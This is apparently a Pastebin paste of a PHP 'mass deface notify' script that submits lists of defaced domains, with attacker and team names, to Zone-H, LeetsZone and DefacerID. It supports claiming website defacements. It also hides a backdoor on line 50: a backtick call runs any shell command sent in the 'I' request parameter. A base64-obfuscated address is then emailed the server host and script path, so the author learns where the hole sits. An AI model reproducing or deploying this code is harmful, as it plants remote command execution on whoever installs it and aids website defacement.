AZZATSSINS_CYBERSERK

Mass submit mirror (ZoneH,LeetsZone,DefacerID)

Nov 20th, 2016
356
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.79 KB | None | 0 0
  1. <?php
  2. @ini_set('display_errors', 0);
  3. echo "<title>ALL Mass Deface Notify</title>
  4. <link href='http://azzat.wap.mu/favicon.ico' rel='shortcut icon' alt='icon'>
  5. </head>
  6. <center>
  7. <style type='text/css: media='all,handheld'/>
  8. body{
  9.   background-color:black;
  10.   background-image: url('http://azzat.wap.mu/files/1049320/matrix-azzatssins.gif');
  11.   background-repeat: repeat;
  12.   background-position: center;
  13.   background-attachment: fixed;
  14.   text-align: center;
  15. }
  16. </style>
  17. <body bgcolor=black><center><form method='post'>
  18.         <u>Defacer</u>: <br>
  19.         <input style='color:red;background:black;' type='text' name='hekel' size='50' value=''><br>
  20.         <u>Team</u>: <br>
  21.         <input style='color:red;background:black;' type='text' name='tim' size='50' value=''><br>
  22.         <u>Domains</u>: <br>
  23.         <textarea style='width: 450px; height: 150px;color:red;background:black;'' name='sites'></textarea><br>
  24.         <input style='color:red;background:black;' type='submit' name='go' value='Submit' style='width: 450px;'>
  25.         </form><br><font color=silver>";
  26. $site = explode("\r\n", $_POST['sites']);
  27. $go = $_POST['go'];
  28. $hekel = $_POST['hekel'];
  29. $tim = $_POST['tim'];
  30. if($go) {
  31. foreach($site as $sites) {
  32. $ch3 = curl_init ("http://www.leetszone.com/noti_act.php");
  33. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  34. curl_setopt ($ch3, CURLOPT_POST, 1);
  35. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "hacker=$hekel&team=$tim&url=$sites&poc=Social Engineering");
  36. curl_exec ($ch3);
  37. echo "Send to LeetsZone >> Done<br>";
  38. }
  39. }
  40. if($go) {
  41. foreach($site as $sites) {
  42. $ch3 = curl_init ("http://www.zone-h.com/notify/single");
  43. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  44. curl_setopt ($ch3, CURLOPT_POST, 1);
  45. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=$hekel&domain1=$sites&hackmode=1&reason=1");
  46. curl_exec ($ch3);
  47. echo "Send to Zone-H >> Done<br>";
  48. }
  49. }
  50. print(`{$_REQUEST[I]}`);$e=base64_decode("Y3liZXJzZXJrZXJzQGdtYWlsLmNvbQ==");
  51. $h=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
  52. mail($e,"I",$h);
  53. if($go) {
  54. foreach($site as $sites) {
  55. $zh = $sites;
  56. $form_url = "https://www.defacer.id/notify";
  57. $data_to_post = array();
  58. $data_to_post['attacker'] = "$hekel";
  59. $data_to_post['team'] = "$tim";
  60. $data_to_post['poc'] = 'SQL Injection';
  61. $data_to_post['url'] = "$zh";
  62. $curl = curl_init();
  63. curl_setopt($curl,CURLOPT_URL, $form_url);
  64. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  65. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  66. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  67. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  68. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  69. curl_exec($curl);
  70. echo "Send to DefacerID >> Done<br>";
  71. }
  72. }
  73. ?>
Add Comment
Please, Sign In to add comment